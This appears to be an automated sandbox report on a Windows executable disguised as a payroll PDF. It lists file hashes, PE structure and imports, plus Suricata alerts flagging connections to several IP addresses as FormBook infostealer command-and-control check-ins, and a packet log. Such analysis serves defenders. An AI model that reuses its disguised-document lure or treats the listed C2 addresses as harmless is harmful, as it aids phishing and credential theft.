TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PAYROLL SUMMARY _pdf.exe
File size:	1'272'832 bytes
MD5:	61b505c361c46a4c09a1e07ff7e168c9
SHA1:	b6c0ac6f7d6dabf4507b696c7f4fb7df56925cb6
SHA256:	ece6e00b972a047c226be550cb05f4c0636e3a50a0a65e595b5286e0e2fcdc4a
SHA512:	25fc43d5f97552673049d42a7dc57010c7641a27d9f907026aa3fb149cb5bd92bbbe42a6b7b365d939ef9742736f3089abd5074eb7e946553e562e7e609ec992
SSDEEP:	24576:EAHnh+eWsN3skA4RV1Hom2KXMmHaiDxc6R/B5a/CRZK/bq95:Th+ZkldoPK8YaiDxXg6ZKDI
TLSH:	8745BE0273D1C036FFAA92739B6AF60156BD79254133852F13982DB9BD701B2263E763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66B549F1 [Thu Aug 8 22:42:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F00DCB7C03Dh
jmp 00007F00DCB6EDF4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F00DCB6EF7Ah
cmp edi, eax
jc 00007F00DCB6F2DEh
bt dword ptr [004C41FCh], 01h
jnc 00007F00DCB6EF79h
rep movsb
jmp 00007F00DCB6F28Ch
cmp ecx, 00000080h
jc 00007F00DCB6F144h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F00DCB6EF80h
bt dword ptr [004BF324h], 01h
jc 00007F00DCB6F450h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F00DCB6F11Dh
test edi, 00000003h
jne 00007F00DCB6F12Eh
test esi, 00000003h
jne 00007F00DCB6F10Dh
bt edi, 02h
jnc 00007F00DCB6EF7Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F00DCB6EF83h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F00DCB6EFD5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x6c554	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x135000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x6c554	0x6c600	2133bf966d422ed52583255ed94f7a9a	False	0.9394824106113033	data	7.918399533436528	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x135000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x637ec	data			1.0003214471501625
RT_GROUP_ICON	0x133fa4	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x13401c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x134030	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x134044	0x14	data	English	Great Britain	1.25
RT_VERSION	0x134058	0x10c	data	English	Great Britain	0.5970149253731343
RT_MANIFEST	0x134164	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-09T08:43:19.691812+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49754	80	192.168.2.6	91.195.240.19
2024-08-09T08:43:30.815371+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49757	80	192.168.2.6	194.58.112.174
2024-08-09T08:42:49.639212+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49745	80	192.168.2.6	199.192.19.19
2024-08-09T08:43:38.454474+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49760	80	192.168.2.6	194.58.112.174
2024-08-09T08:41:49.786447+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49733	80	192.168.2.6	43.252.167.188
2024-08-09T08:42:43.875899+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49744	80	192.168.2.6	23.251.54.212
2024-08-09T08:41:27.987267+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49729	80	192.168.2.6	208.91.197.27
2024-08-09T08:41:25.447575+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49728	80	192.168.2.6	208.91.197.27
2024-08-09T08:42:08.965800+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49739	80	192.168.2.6	194.9.94.85
2024-08-09T08:41:47.519113+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49732	80	192.168.2.6	43.252.167.188
2024-08-09T08:42:06.438732+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49738	80	192.168.2.6	194.9.94.85
2024-08-09T08:43:22.352040+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49755	80	192.168.2.6	91.195.240.19
2024-08-09T08:43:35.884606+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49759	80	192.168.2.6	194.58.112.174
2024-08-09T08:42:52.428507+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49746	80	192.168.2.6	199.192.19.19
2024-08-09T08:40:36.796792+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49718	80	192.168.2.6	5.44.111.162
2024-08-09T08:41:52.326508+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49734	80	192.168.2.6	43.252.167.188
2024-08-09T08:42:03.866274+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49737	80	192.168.2.6	194.9.94.85
2024-08-09T08:43:09.105099+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49751	80	192.168.2.6	213.145.228.16
2024-08-09T08:43:47.726673+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49763	80	192.168.2.6	172.67.210.102
2024-08-09T08:42:18.912011+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49741	80	192.168.2.6	23.251.54.212
2024-08-09T08:40:58.238386+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49722	80	192.168.2.6	217.160.0.106
2024-08-09T08:43:17.146520+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49753	80	192.168.2.6	91.195.240.19
2024-08-09T08:41:22.940737+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49727	80	192.168.2.6	208.91.197.27
2024-08-09T08:43:11.420811+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49752	80	192.168.2.6	213.145.228.16
2024-08-09T08:43:24.953013+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49756	80	192.168.2.6	91.195.240.19
2024-08-09T08:41:00.699315+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49724	80	192.168.2.6	217.160.0.106
2024-08-09T08:43:33.339109+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49758	80	192.168.2.6	194.58.112.174
2024-08-09T08:42:16.365063+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49740	80	192.168.2.6	23.251.54.212
2024-08-09T08:43:45.193327+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49762	80	192.168.2.6	172.67.210.102
2024-08-09T08:42:55.038438+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49747	80	192.168.2.6	199.192.19.19
2024-08-09T08:40:52.676692+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49720	80	192.168.2.6	217.160.0.106
2024-08-09T08:43:50.255850+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49764	80	192.168.2.6	172.67.210.102
2024-08-09T08:39:59.427410+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49765	80	192.168.2.6	172.67.210.102
2024-08-09T08:43:03.839654+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49749	80	192.168.2.6	213.145.228.16
2024-08-09T08:42:21.474682+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49743	80	192.168.2.6	23.251.54.212
2024-08-09T08:41:31.351763+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49730	80	192.168.2.6	208.91.197.27
2024-08-09T08:43:06.369453+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49750	80	192.168.2.6	213.145.228.16
2024-08-09T08:40:55.206539+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49721	80	192.168.2.6	217.160.0.106
2024-08-09T08:42:01.305968+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	49736	80	192.168.2.6	194.9.94.85
2024-08-09T08:42:57.475244+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49748	80	192.168.2.6	199.192.19.19
2024-08-09T08:41:55.515796+0200	TCP	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	49735	80	192.168.2.6	43.252.167.188

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 9, 2024 08:40:36.094424963 CEST	49718	80	192.168.2.6	5.44.111.162
Aug 9, 2024 08:40:36.099618912 CEST	80	49718	5.44.111.162	192.168.2.6
Aug 9, 2024 08:40:36.099716902 CEST	49718	80	192.168.2.6	5.44.111.162
Aug 9, 2024 08:40:36.103529930 CEST	49718	80	192.168.2.6	5.44.111.162
Aug 9, 2024 08:40:36.108547926 CEST	80	49718	5.44.111.162	192.168.2.6
Aug 9, 2024 08:40:36.796612024 CEST	80	49718	5.44.111.162	192.168.2.6
Aug 9, 2024 08:40:36.796732903 CEST	80	49718	5.44.111.162	192.168.2.6
Aug 9, 2024 08:40:36.796792030 CEST	49718	80	192.168.2.6	5.44.111.162
Aug 9, 2024 08:40:36.800992966 CEST	49718	80	192.168.2.6	5.44.111.162
Aug 9, 2024 08:40:36.805876970 CEST	80	49718	5.44.111.162	192.168.2.6
Aug 9, 2024 08:40:52.009345055 CEST	49720	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:52.014380932 CEST	80	49720	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:52.014458895 CEST	49720	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:52.016189098 CEST	49720	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:52.021017075 CEST	80	49720	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:52.676192045 CEST	80	49720	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:52.676594019 CEST	80	49720	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:52.676692009 CEST	49720	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:53.521265030 CEST	49720	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:54.539175987 CEST	49721	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:54.545085907 CEST	80	49721	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:54.545164108 CEST	49721	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:54.546749115 CEST	49721	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:54.552326918 CEST	80	49721	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:55.206078053 CEST	80	49721	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:55.206370115 CEST	80	49721	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:55.206538916 CEST	49721	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:56.052553892 CEST	49721	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:57.070590973 CEST	49722	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:57.491236925 CEST	80	49722	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:57.491420984 CEST	49722	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:57.492974997 CEST	49722	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:57.497757912 CEST	80	49722	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:57.497925043 CEST	80	49722	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:58.238182068 CEST	80	49722	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:58.238333941 CEST	80	49722	217.160.0.106	192.168.2.6
Aug 9, 2024 08:40:58.238385916 CEST	49722	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:40:59.005613089 CEST	49722	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:41:00.023948908 CEST	49724	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:41:00.028920889 CEST	80	49724	217.160.0.106	192.168.2.6
Aug 9, 2024 08:41:00.029006958 CEST	49724	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:41:00.030673027 CEST	49724	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:41:00.035506964 CEST	80	49724	217.160.0.106	192.168.2.6
Aug 9, 2024 08:41:00.698339939 CEST	80	49724	217.160.0.106	192.168.2.6
Aug 9, 2024 08:41:00.699208021 CEST	80	49724	217.160.0.106	192.168.2.6
Aug 9, 2024 08:41:00.699315071 CEST	49724	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:41:00.701654911 CEST	49724	80	192.168.2.6	217.160.0.106
Aug 9, 2024 08:41:00.706451893 CEST	80	49724	217.160.0.106	192.168.2.6
Aug 9, 2024 08:41:22.443754911 CEST	49727	80	192.168.2.6	208.91.197.27
